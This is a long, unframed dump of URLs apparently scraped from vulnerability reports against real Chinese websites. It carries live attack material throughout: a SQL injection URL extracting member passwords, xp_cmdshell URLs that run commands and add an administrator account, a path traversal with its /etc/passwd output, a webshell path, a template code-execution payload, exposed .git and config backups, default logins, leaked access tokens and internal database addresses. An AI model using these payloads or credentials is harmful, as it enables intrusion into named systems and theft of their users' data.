http://www.mshdai.com/index.php?ctl=stations&act=detail&id=20 http://www.mshdai.com/index.php?ctl=stations&act=contact&id=22 http://www.mshdai.com/index.php?ctl=new%27&id=27 http://cy.ujs.edu.cn/sysadmin/ http://www.kkeye.com/tfadmin/tfadmin.rar http://mojing.baofeng.com/admin/index/login http://**.**.**.**/bugs/wooyun-2010-0102460已经提交keword参数存在注入,并且已经整改,但是参数grade_id、section_id http://www.wogps.net/ http://www.wogps.net/Lbs/MainFrame.ashx?nowdate=21-40-31&callJudge=selectedNodeChanged&CompanyID=80&ClientID=undefined,其中CompanyID为从1到90的任意数字 http://www.wogps.net/BaseInfo/MaintenanceData.ashx?callJudge=selectCompanyInfo&hidCompanyID=1可以查看此系统所有使用部门及公司信息 http://job.shangdu.com/search.php?city_id=38%27 http://www.91daoxue.com/ http://**.**.**.**/logon/logonOut.action http://nos.netease.com/mail-online/66a5925e819b3a3b0429810360bf28ba/mail180x180.jpg","access_token2":"2312224de56c8a368399fd6bf7220d02","token_secret":null,"expires_in":"86400","code":"1","refresh_token":"f7da74d51fb044ffad41096da0018351","connExpireTime":"1443877476756","access_token":"f0fb105739356f146bd1a6aba4d17ac2 http://jira6-demo.hz.netease.com jdbc:mysql://10.120.154.169:3306/jira?useUnicode=true&characterEncoding=UTF8&sessionVariables=storage_engine=InnoDB jdbc:mysql://10.120.154.169:3306/jira?useUnicode=true&characterEncoding=UTF8&sessionVariables=storage_engine=InnoDB https://webatm.scu.org.tw/eatmscu/ https://webatm.scu.org.tw/eatmscu/logon.jsp?svcBankId=163 http://wooyun.org/bugs/wooyun-2015-0108929 http://www.5150w.cn/ http://lengku.5150w.cn/ http://www.117go.com/tour/82722613 http://kids.sflep.com/wicresoft.pgs.web/default.aspx?SignIn=true http://kids.sflep.com/Wicresoft.FeedBack/InformationSearch.aspx http://wap.kdnet.net/ https://www.shfft.com/ajax/getAmount.action, http://mail.open.com.cn/(其实邮箱域名有好几个.....) 
http://www.hnaa.net.cn/index.php?r=cmsSite/list&id=11 http://oa.open.com.cn/user/login http://219.139.20.19:8080/Main/Main.aspx http://isdm.nuc.edu.cn/Edit/editor/img.htm# http://pre-forum.grandcloud.cn/ http://pre-forum.grandcloud.cn/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x27,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://pre-forum.grandcloud.cn/templates/grandcloud/.svn/entries http://pre-forum.grandcloud.cn/test.php http://m.haodf.com/touch/booking/rependpatient?patientId=891005883 http://218.247.130.150/pi.php http://218.205.175.250/test.php http://tdxbjm.csc108.com/test.php https://112.124.211.176/.git/config https://112.124.211.186/image.do http://**.**.**/zabbix-bakup/ https://www.hjiabank.com/ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** www.ddy98.com http://shop.ehuatai.com/manage/login.action存在st2漏洞 http://pro.ezloan.cn/phpmyadmin/ http://pro.ezloan.cn/phpmyadmin/ http://silent.lianluo.com/silent/admin/admin_login.action http://www.softtrans.com/ http://gateway.pactera.com http://gateway.pactera.com http://**.**.**.**/main/users/resetPwd/index.html#ty http://**.**.**.**/taskprint/login.jsp http://**.**.**.**/taskprint/category/userAction_login.action http://**.**.**.**/taskprint/god.jsp http://www.jjshome.com http://183.129.228.3/member.php?mod=logging&action=login&referer=%2Fhome.php http://china-yintai.com/newsContent.php?id=228 http://www.openedu.cn/ http://www.openedu.cn/admin/login.aspx http://116.213.120.229/tools/upload_ajax.ashx http://www.east.net/user/userForgetPassword?code=f22e3bc14cf6d089c0df65e068ada946&email=807085168%40qq.com http://auto.mop.com/topic/workpage/index.shtml 
http://pic.auto.mop.com/admin/login.jsp http://www.tmall.com/go/chn/common/js-api.php http://61.233.19.170/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://**.**.**.**:7001/medicine-price.jsp?page=1&BH=&MC=1 http://10.11.180.18/guest/device_provisioning2.php?cmd=login&mac=74:51:ba:56:34:7f&ip=10.180.146.90&essid=PA_WLAN_MR&apname=00:24:6c:c0:19:1e&apgroup http://oa.kdnet.net/?a=edt&c=info&id=385&pid=9853 http://**.**.**.**/ http://**.**.**.** http://12580.weili.cmpower.cn http://docs.jpush.io/guideline/android_guide/ http://docs.jpush.io/client/android_api/#receiver android:name="您自己定义的Receiver android:enabled="true android:name="cn.jpush.android.intent.REGISTRATION android:name="cn.jpush.android.intent.UNREGISTRATION android:name="cn.jpush.android.intent.MESSAGE_RECEIVED android:name="cn.jpush.android.intent.NOTIFICATION_RECEIVED android:name="cn.jpush.android.intent.NOTIFICATION_OPENED android:name="cn.jpush.android.intent.ACTION_RICHPUSH_CALLBACK android:name="cn.jpush.android.intent.CONNECTION android:name="您应用的包名 dckf.digitalchina.com/index.php/point/register,其中参数userid和username均存在注入。 index.php/point/register http://**.**.**.**/ http://**.**.**.**/.git/config http://vip.yishion.com/act1.php?id=13 http://111.206.82.153/web/admin.php http://qingmengjia.com/ http://180.97.28.88/ https://**.**.**.**/findloginpwd/findloginpwd1.jsp http://122.96.93.126/index.php?c=ufr&model=Pioneer+M1&fid=6 http://122.96.93.126/index.php?c=ufr&model=Pioneer+M1&fid=6 http://**.**.**.**/ind_qyyj.asp?id=119 http://**.**.**.**/bugs/wooyun-2010-055517 http://www.ssap.com.cn/admin/CEC_Login.htm http://www.ssap.com.cn/SKWX/XueShu/XueShu_SearchInfo.aspx?searchText=a%27&channelId=10029 http://www.4008823823.com http://203.130.41.40:80/download/resource/下面的不同的产品目录里面 http://203.130.41.40:80/download/resource下载用户的头像,幸运的是该目录可以列目录 URL:http://**.**.**.**/InfoValue.aspx?id=75 
http://www.intimecity.com.cn/view/index/index.php?id=49 username:fhytc password:fhytc123 http://**.**.**.**/ http://**.**.**.** http://group.edai.com http://update.funshion.com/login/index.php?c=login&a=login&so=begin http://drops.wooyun.org/tips/845 http://**.**.**.**/ http://**.**.**/index.html http://**.**.**.**/cn/about/default.aspx http://**.**.**.**/?source=bd002 http://lib.ia.ac.cn/ http://jiayzh.isl.ac.cn http://wuzhj.isl.ac.cn/ http://lilj.isl.ac.cn/ http://wangm.isl.ac.cn/ http://wuzhj.isl.ac.cn http://hmiss.siat.ac.cn http://crehabtech.siat.ac.cn http://mis.siat.ac.cn http://lrh.siat.ac.cn http://nano.siat.ac.cn http://tmc.siat.ac.cn/8 http://geneandcelllab.siat.ac.cn www.mted.ibcas.ac.cn http://www.mted.ibcas.ac.cn http://www.mted.ibcas.ac.cn http://www.mted.ibcas.ac.cn http://ecores.cib.ac.cn http://eam.cib.ac.c http://fbm.cib.ac.cn http://herpneuro.cib.ac.cn http://westcrops.cib.ac.cn http://tcm.cib.ac.cn/ http://sci.ia.ac.cn/ http://iblog.ciomp.ac.cn http://dx.qhlly.cn:8080/QBOS/ cn:8080 http://dx.qhlly.cn:8080 http://202.99.45.117/oop.jsp http://**.**.**.**/article/index.php http://coldchain.panasonic.cn/ http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347 http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347 http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347 http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347 http://**.**.**.**/ http://**.**.**.**/index.php/Business/index/id/14 http://**.**.**.**:81/ http://**.**.**.**:81/file/reg-wsj.asp admins:admins http://**.**.**.**/inform_detailinfo.jsp?subType=tzgg&key=45053520 http://pas.sflep.com/index.php?option=com_products&view=products&cid=12&Itemid=3 http://2.suning.com https://**.**.**.**/netpay/ https://**.**.**.**/ http://**.**.**.**/template/LYGCL-N/script/search.aspx?content=* 
http://api.ffan.com/ffan/user/15000000000002100?userType=0&mac=68%3A3E%3A34%3A32%3AA0%3AFE&appid=feifan&day=20150902&wdId=db9f5185ab0beb3c4b6ea459952918c2&couponStatus=3&imei=525af1deaf994570ae27070eb4b8b0f064d3ef4c&clientversion=20020&version=1&loginToken=f80871a2b390d8cbccdf96dc032c9be5&keywordType=0&mailStatus=0&ddId=525af1deaf994570ae27070eb4b8b0f064d3ef4c&orderStatus=%5B%22INITIAL%22%5D&bookingStatus=1 http://218.28.100.164:66/index.jsp http://nc.sinorail.com/index.jsp http://61.50.130.202:8080/index.jsp http://61.232.6.152/index.jsp http://202.104.113.14:8081/index.jsp http://61.135.227.114/index.jsp http://42.243.108.34/index.jsp http://222.189.30.38:8081/index.jsp http://221.6.47.226:88/index.jsp http://210.75.98.52/index.jsp http://218.94.92.43/index.jsp http://210.13.83.58/index.jsp http://203.86.55.104:8080/index.jsp http://221.226.98.6:8088/index.jsp http://221.226.215.205:8000/index.jsp http://221.2.65.198/index.jsp http://218.94.129.167/index.jsp http://221.2.65.198/index.jsp http://218.2.103.100/index.jsp http://123.150.95.86/index.jsp http://115.231.95.234/index.jsp http://58.213.130.237:8000/index.jsp http://101.95.113.130/index.jsp http://218.28.100.164:66/index.jsp https://jiaofei.alipay.com/market/chargeRemindInfoEntering.htm https://zht.alipay.com/asset/newIndex.htm http://**.**.**.**/cms/docInfo!list.action?templateId=44&channelId=64&code=dkmbx http://**.**.**.**/basic/usermanager/sysOrgUser/login http://mail.east.net/webmail/ http://yimin.edai.com/news.php?classid=3 http://yimin.edai.com/immigrate.php?act=home&country=27 http://www.piaozhijia.cn:80/feedback/queryFeedbackList data:mobile=angelina http://**.**.**.**/peixun/HXPayOrder.aspx?productID=cfzz1&CfzzUser=sdsdsdsd&CfzzUID=109&type=3 http://**.**.**.**/Expert_saying/index_on1.aspx?username=all&pageindex=2&stockid= http://mail.iliangcang.com/ http://**.**.**.**/servlet/FileDownload?filepath=C:\Windows\System32\notepad.exe&dispname=1.exe http://yunpan.cn/cmYW4UHdgRT2M 
http://yunpan.cn/cmY5vHsqkPZ8J http://new.edong.com:80/ http://shequ.docin.com/app/teamMessage/updateTeamDisdussion?teamId=2536&cardId=5244022 URL:http://www.83800000.com.cn/customer/setNewPassword?phoneNo=手机号 http://www.yjtf.im/yjtf/admin/index.htm http://gateway.minanins.com:9002/console/login/LoginForm.jsp http://gateway.minanins.com:9002/job1/test1.jsp?o=vLogin http://www.vcanbio.com//Investor_ArticleDetail.aspx?id=8 http://yt.linekong.com/reporter.php?serverName=%D7%DD%BA%E1%CB%C4%BA%A3&sort_id=304 http://**.**.**.**/manager/index.htm http://**.**.**.**/bugs/wooyun-2010-0102089 http://**.**.**.**/newsshow.aspx?NewsId=424 http://dckf.digitalchina.com/ http://**.**.**.**/shenpi/mjzz/platform/frame.do http://**.**.**.**/portal/HomePage!index.do http://**.**.**.**/ http://sales.tsingtao.com.cn:8080 http://mail.dlairport.com http://eb.e-bridge.com.cn/newebridge/default.jsp http://www.kkeye.com/dcjj/dcjijin_bak.rar http://www.kkeye.com/dcjj/DCJJ.rar http://www.kkeye.com/kkeyet/newuser/data1.txt http://www.kkeye.com/kkeyet/newuser/list.txt http://www.kkeye.com/kkeyet/newuser/listjjbao.txt http://www.kkeye.com/kkeyet/newuser/listjjbao1.txt http://www.kkeye.com/kkeyet/newuser/listmt.txt http://www.kkeye.com/kkeyet/newuser/listmt1.txt http://www.kkeye.com/kkeyet/newuser/listqy1.txt http://**.**.**.**/login.aspx http://chat11.jd.com/ http://chat9.jd.com/ http://www.kkeye.com/feedlogin/ http://www.kkeye.com/FeedLogin/MediaInfo/Default.aspx http://**.**.**.**/AdminUserLogin.aspx http://yt.linekong.com/article.php?article_id=* http://yt.linekong.com/lookvote.php?vote_id=* http://yt.linekong.com/reporter.php?serverName=%D5%CC%BD%A3%B3%A4%B8%E8&sort_id=* http://yt.linekong.com/voting.php?types=radio&vote_id=* http://gps.jztey.com/lbsn/CLDMain/Login.htm http://gdykyy.com/lbsn/CLDMain/MainPage.htm http://www.kkeye.com/crm2/ http://crm.kkeye.com/ http://bbs.fund123.cn/。发现可以插入图片。 http://**.**.**.**/bns/resume/ResumeInfo/showAddPage.do 
http://59.175.169.110:6080/ZRDJ_UI/Count/personDetail.aspx?sqbh=220238 http://59.175.169.110:6080/ZRDJ_UI/FamilyManage1.aspx?keyId=2213008 http://59.175.169.110:6080/BZJDGL/tscl/tsclSys_Edit.aspx?id=47(修改id参数即可遍历) http://cn.toursforfun.com/mall?clk_source=Promotions&clk_term=mall&utm_source=ad&utm_medium=wzl&utm_term=mall http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21 http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21* http://yt.linekong.com/activity/dragon/content.php?article_id=* http://yt.linekong.com/special/newversion/detail.php?article_id=* http://yt.linekong.com/special/newversion1.4/article.php?article_id=* http://yt.linekong.com/voting.php?types=radio&vote_id=* http://**.**.**.**/ http://**.**.**/ www.0574ic.com http://**.**.**.**/women?subCate=tops http://dw.c6s.cn/New/login.jsp http://www.dsfjk.com:8080/loginAction!newLogin.do http://dw.c6s.cn/carAction!getCarById.do?car.id=1032 http://dw.c6s.cn/driverAction!getById.do?driver.id=68 http://gms.funshion.com/ http://180.166.148.90/index.php?m=my&f=index http://**.**.**.**/test/ http://**.**.**.**/web/ http://**.**.**.**/download/ http://**.**.**.**/zzcx/zzcx/chaxun.aspx(表单提交处存在漏洞) https://mail.youku.com/owa/ http://uos.manage.youku.com www.ilife.cn http://www.ilife.cn/Common/ProductRemarkDetail.asp?ProductRemarkId=565 http://www.ilife.cn/Common/ProductRemarkDetail.asp www.casagroup.com.cn http://order.casagroup.com.cn http://home.casagroup.com.cn http://vip.umisky.com/UploadFiles/Users/U1000025007/adefbb25-4ce8-45b7-924f-116bd50cd7e8.aspx http://**.**.**.**/ https://www.anpingdai.com/index.php?s=/Home/About/infoDetails/category_id/6/id/12.html https://www.anpingdai.com/index.php?s=/Home/About/infoDetails/category_id/6/id/12*.html http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ https://github.com/bilychen/learngit/blob/f8e2c327f53df4a207f827b0707ba3c2eca3601f/userful.txt https://oa.hujiang.com/ https://www.teambition.com http://npm.repository.servision.com.cn 
http://navigator.servision.com.cn:8402 http://navigator.servision.com.cn:8401 http://class.hujiang.com/ http://class2.hujiang.com/ http://yz.class.hujiang.com/ com:class/mc-hujiang-com.git com:class/class-hujiang-com.git https://gitlab.yeshj.com/ http://**.**.**.**/ssqpk/betHistory.action?userName=137994616&lotteryId=119 url:http://59.44.219.196:80/manager/html user:tomcat pass:tomcat http://59.44.219.196/probe/ http://**.**.**.** http://**.**.**.**/uddiexplorer/SetupUDDIExplorer.jsp http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/NewsView5.asp?id=1 http://kybpc.chexian.sinosig.com/easyInsurance/html5/login.html http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do http://**.**.**.**/news.asp?key=a https://onstar.com.cn/ http://**.**.**.**/# http://**.**.**.**/admin?alias=photo&tab=definition jdbc:oracle:thin:@**.**.**.**:1521:ksrk http://mail.7daysinn.cn/ http://**.**.**/data/worktable/ http://bang.liba.com/resource/decorate/delicacy/album/1412/comm http://bang.liba.com/resource/decorate/delicacy/album/1412/collect user:tomcat pass:tomcat user:tomcat pass:tomcat user:tomcat pass:tomcat user:admin user:tomcat pass:tomcat user:admin pass:admin user:tomcat pass:123456 URL:http://**.**.**.**/api/api/student/profile/seconde/get/ http://**.**.**.**/api/ubus/services/obtainCode http://gz.voc.com.cn/ http://gz.voc.com.cn/data/admin/ver.txt http://www.51booking.cn www.51booking.cn)创立于2005年,隶属于广州忠侨咨询服务有限公司,是中国领先的在线旅游预订服务提供商之一,运用网络概念成功整合了高科技产业与传统旅行业,向超过100万会员提供国内酒店预订,城市旅游指南等,会员酒店覆盖全国550个商旅城市,酒店信息高达18,000余家。 http://www.51booking.cn/system/ user:admin pass:admin http://test.365yf.com/ http://test.365yf.com/admin http://**.**.**.**/men.php?id=4 http://tuser.kdnet.net/login_new.asp http://absfx-rf.com/zh-cn/read.jsp?id=1,如图所示: http://www.af-express.com/city.aspx?wang=957&city=974&type=%E8%B4%9F%E8%B4%A3%E4%BA%BA&keywords=123 http://www.af-express.com/city.aspx?wang=957&city=975&type=%E8%B4%9F%E8%B4%A3%E4%BA%BA&keywords=123 
http://dmoa.cofco.com/seeyon/index.jsp http://**.**.** http://**.**.**.**/Frmmain.asp http://**.**.**.**/pmvm5/logon.asp http://www.yoho.cn/passport/personal/setting https://mail.richinfo.cn/webmail/login/login.do http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-028946 wanlehui.fumu.com/portal.php?mod=list&catid=6&cate_sub=9&order_term=1&master=刘彤 http://baodian.fumu.com/module/aciton/param1/$%7B@print%28THINK_VERSION%29%7D http://baodian.fumu.com/admin/ http://download.jikexueyuan.com/detail/id/1970*.html http://www.eventdove.com/ate/getAttendeeInfo/e/51404620/u/1211开始遍历 http://**.**.**.**/news-detail.php?id=2675 http://wooyun.org/bugs/wooyun-2010-085917这个漏洞,里面有张截图泄漏了员工号和邮箱前缀,没打码哈哈~ http://**.**.**.**/ http://m.xyzq.com.cn:8888/scopia/entry/index.jsp http://m.xyzq.com.cn:8888/scopia/admin/index.jsp http://**.**.**.**/browser.do?browser=../../../../../../../../../../etc/passwd&method=download root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ganglia:x:100:101:Ganglia System:/var/lib/ganglia:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin nagios:x:101:102:nagios:/var/log/nagios:/bin/sh apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin 
ntp:x:38:38::/etc/ntp:/sbin/nologin openvpn:x:102:103:OpenVPN:/etc/openvpn:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin backuppc:x:103:107::/var/lib/BackupPC:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin avahi-autoipd:x:104:108:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin ntop:x:105:109:ntop:/var/lib/ntop:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin hacluster:x:106:110::/opt/NeoShineHA/lib/heartbeat:/bin/false oracle:x:500:502::/oracle:/bin/bash zabbix:x:501:503::/home/zabbix:/bin/bash http://lcse.lenovo.com.cn/RPS/GetJson/Proc_PerInfo.ashx?method=addFavorite&personId=1&loginId=1&focusType=1&n=0.31630329026691173 http://**.**.**.**/company/index.php?item=commit_message&member_id=73 http://www.kingcms.com/download/k9/。虽然官网下载的是9.00.0018,但是安装完成后,可以在后台在线升级,升级成最新版9.00.0019,最新版的cms就存在这个漏洞,这是新版本新增功能带来的漏洞。 http://www.focuznet.com/k9/t3012/ (特别是安装的后面部分操作) http://cloudytrace.com/这是网址 http://bbs.jzq001.com/plugin.php?classid=1851&fileext=1&id=mall&type=shop_search&typeid=1857 http://wt.wodexiangce.cn/changePassword.faces?date=20150904201648&useremail=chenlin@photo.wdxc.cn http://wt.wodexiangce.cn/changePassword.faces?date=20150904201648&useremail=admin@wodexiangce.cn http://wt.wodexiangce.cn/changePassword.faces?date=20150904201648&useremail=service@wodexiangce.cn user:tomcat pass:tomcat user:tomcat pass:tomcat user:admin http://mall.jzq001.com/ http://mall.jzq001.com/forum.php?mod=viewthread&tid=47084 http://coral.qq.com 
http://**.**.**.**/default/faqs/category/category_id/10* http://**.**.**.**/,页面找到“道路业户”,点击进去后,找到注入点 http://www.51langtu.com/ http://123.147.164.34:8080/ http://123.147.164.34:8080/File/ http://123.147.164.64:8083/wom/wom/test_checkInface4G.action http://**.**.**.**/aboutus.jsp?xwid=17&lmmc=dd_gsgk http://**.**.**.**/info_pagelist.jsp?page=1&lmmc=dd_gsxw&plmjc=xwzx&xwid=12553放入sqlmap检测,如图所示: http://www.cetools.cn/ index.php/cetools/passwordmodi www.cetools.cn http://siyue.jinku.com:80/index.php/Index/slist/aid/3052 http://**.**.**.**/message.asp?id=2893 http://**.**.**/SysLoginAction!login.do http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/DBMS/LBS_Manager/UserManager.aspx?HoldID=79139 http://**.**.**.**/DBMS/LBS_Manager/AddUserInfo.aspx?ParentHoldID=79139&holdID=79139&userID=34346 http://**.**.**.**/ http://**.**.**.**/show.php?id=18382&catid=8 http://**.**.**.**/Images/UpPhoto/sjtu/10248715********2.jpg http://**.**.**.**/info/index.asp,发现该数码公司客户不止交大一家,而是遍及上海近百高校(疑似学校指定的拍照点)。 http://219.143.213.189/ http://mail.wyn88.com/ https://218.94.7.120/prx/000/http/localhost/login https://218.94.7.120:8888/ https://218.94.7.120:9888同样是array的登陆口,应该都是负责管理vpn的 https://218.94.7.120:9888 https://218.94.7.120/prx/000/http/localhost/login user:tomcat pass:tomcat http://**.**.**.**/news_2015.aspx?vDjbh=XWLB150812-0001 http://**.**.**.**/menpiaonew_list.aspx?vM_jdbm=JDLB20120730-0016 http://**.**.**.**/xianlusearch.html?xlfl=%E5%8C%BA%E5%A4%96%E7%BA%BF%E8%B7%AF http://**.**.**.**/xianlu_list.aspx?vM_jdbm=XLLB150820-0002 http://**.**.**.**/venues_2015.aspx?vBM=YCCG20120714-0007 http://**.**.**.**/xianlusearch.aspx?xlfl=%25u533a%25u5916%25u7ebf%25u8def http://mapi.kaoyan.com/user/login http://**.**.**.**/bugs/wooyun-2014-073399 http://wooyun.org/bugs/wooyun-2015-0128066 http://sso.wy-fund.com/forget_password http://**.**.**.**:8081/hbtproject/user/userLogin.do 
http://**.**.**.**/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://**.**.**.**/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://**.**.**.**/iufotempfile/fbwe81h8vkdvn67w17qot90y6u9s46/utl_webshell_101253.jsp www.ailvxing.com http://www.xmeye.net/login.do?method=goLogin http://www.xmeye.net/mydevice.do?method=edit&id=2107495 http://**.**.**.** http://www.huifund.com http://my.huifund.com:7001/etrading/ https://my.huifund.com/etrading/ http://my.huifund.com:7001/console http://www.youku.com/playlist_show/id_26051337.html http://i.youku.com/u/playlists http://**.**.**.** http://mall.youku.com/itemdetail/item/itemDetail.action?itemId=6589701773214092189 http://mall.youku.com/itemdetail/item/itemDetail.action?itemId=6589701773214092189 http://dlms.bhmc.com.cn/ilearn/getTydAfterSalesList.action?tydId=891572 http://ess.cninsure.net/product/common/cvar/CExec.jsp http://corp.octmami.com:443/includes/config.php.bak http://121.43.234.12/includes/config.php.bak http://w.octmami.com:443/includes/config.php.bak http://121.43.234.12:443/classroom.php?item=14 http://w.octmami.com:443/classroom.php?item=35 http://m.octmami.com/detail/index?goods=583 http://manage.st.octmami.com/wap/detail/index?goods=1031 http://st.octmami.com:80/wap/detail/index?goods=472 octmami.com/octmami2013 http://fair.st.octmami.com/admin.php http://**.**.**.**/article.php?art_id=32 redis_version:2.8.9 redis_git_sha1:00000000 redis_build_id:a16959dddb832cc8 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.7.2 process_id:2027 run_id:c189108802aa74eb3f85b5f056b76809d2c04889 tcp_port:6379 uptime_in_seconds:21487156 uptime_in_days:248 lru_clock:15335148 config_file:/etc/redis/6379.conf used_memory:982712 used_memory_human:959.68K used_memory_rss:1462272 used_memory_peak:1072184 used_memory_peak_human:1.02M used_memory_lua:33792 
mem_fragmentation_ratio:1.49 mem_allocator:jemalloc-3.2.0 rdb_last_save_time:1441397860 total_connections_received:823 total_commands_processed:25239094 expired_keys:2110224 keyspace_hits:18748445 keyspace_misses:4379067 latest_fork_usec:316 role:master repl_backlog_size:1048576 used_cpu_sys:16250.48 used_cpu_user:7414.62 used_cpu_sys_children:0.05 used_cpu_user_children:0.01 db0:keys=1,expires=1,avg_ttl=12982 http://feedback.bj.oupeng.com/ http://www.okpay.com.cn/Default.aspx http://122.228.157.181/gps/ http://t.cn/RyLccPc https://cndms.ztems.com/P49A3_Try_WebService/TMService.asmx/InitDownPack http://121.40.81.22 http://121.40.81.22/company/company/add/id/23.html http://121.40.81.22/company/company/add/id/4.html http://121.40.81.22/company/member/add/id/835.html可确定,有835人 http://ba.hisuzhou.com/filsys/security/login.jsp http://115.238.166.123/cgi-bin/test-cgi http://115.238.166.123/cgi-bin/test-cgi http://m.modernsky.com/index.php?m=User&a=edit_address&id=2830 http://m.modernsky.com/index.php?m=User&a=edit_address&id=2831 http://www.mihoyo.com/hsod2_homepage/news.php?id=6 http://www.zhongyuanauto.com/list.php?id=9 http://u.job168.com/ http://u.job168.com:80/ inurl:/weathermap/weathermap-cacti-plugin.php http://**.**.**.**/plugins/weathermap/weathermap-cacti-plugin.php http://**.**.**.**/graph_view.php?action=tree&tree_id=1&leaf_id=917 http://**.**.**.**/cacti/plugins/weathermap/weathermap-cacti-plugin.php http://**.**.**.**/cacti/plugins/monitor/monitor.php http://**.**.**.**/cacti/graph_view.php?action=preview&host_id=74 http://**.**.**.**/cacti/plugins/superlinks/superlinks.php?id=8 http://**.**.**.**/cacti/graph_view.php?action=tree&tree_id=5&leaf_id=86&select_first=true http://**.**.**.**/plugins/weathermap/weathermap-cacti-plugin.php?action=viewmap&id=07e7c05977f2a66cdba1 http://**.**.**.**/graph_view.php?action=tree&tree_id=1&leaf_id=917 http://**.**.**.**/plugins/weathermap/weathermap-cacti-plugin.php?action=viewmapcycle 
http://112.4.17.117:10007/menberInfo?act=setPasswordNew http://112.4.17.117:10017/VFC/mail/useMail https://cn.toursforfun.com/account_edit.php#my-information https://cn.toursforfun.com/account_edit.php http://cn.toursforfun.com/address_book.php?action=add http://cn.toursforfun.com/address_book.php?action=add http://**.**.**.**/?a=get_all_phonenum&g=wap&itemid=45 http://www.metroshield.com:8080/vmain/login.jsp http://www.metroshield.com:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27whoami%27 http://www.metroshield.com:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27net%20start%27 http://www.metroshield.com:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27REG%20query%20HKLM\SYSTEM\CurrentControlSet\Control\Terminal%22%20%22Server\WinStations\RDP-Tcp%20/v%20PortNumber%27 http://www.metroshield.com:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27net%20user%20wooyun%20wooyun%20/add%27 http://www.metroshield.com:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27net%20localgroup%20administrators%20wooyun%20/add%27 www.metroshield.com:50510 ftp://116.10196.221/ http://m.modernsky.com http://m.modernsky.com/index.php?m=User&a=edit_identities&id=28401 http://m.modernsky.com/index.php?m=User&a=edit_identities&id=28400 http://www.hlyqr.com/diary/show/id/234*.html http://**.**.**.**/homeAction/homeAction.action http://**.**.**.**/bak.jsp http://www.cetools.cn/index.php/example/show_one?id=3707 index.php/example/show_one?id=3707 www.cetools.cn http://**.**.**.**:9080/PriceQuery?shipperCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&conCity=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582&shipperCounty=%25E8%25A5%25BF%25E5%259F%258E%25E5%258C%25BA&conCounty=%25E4%25B8%259C%25E5%259F%258E%25E5%258C%25BA&ebProductTypeId=100000&t=1441445465464 http://**.**.**.**/05xgnew/Default.aspx http://**.**.**.**/ http://**.**.**.**/.svn/entries http://www.bsdimp.net/ 
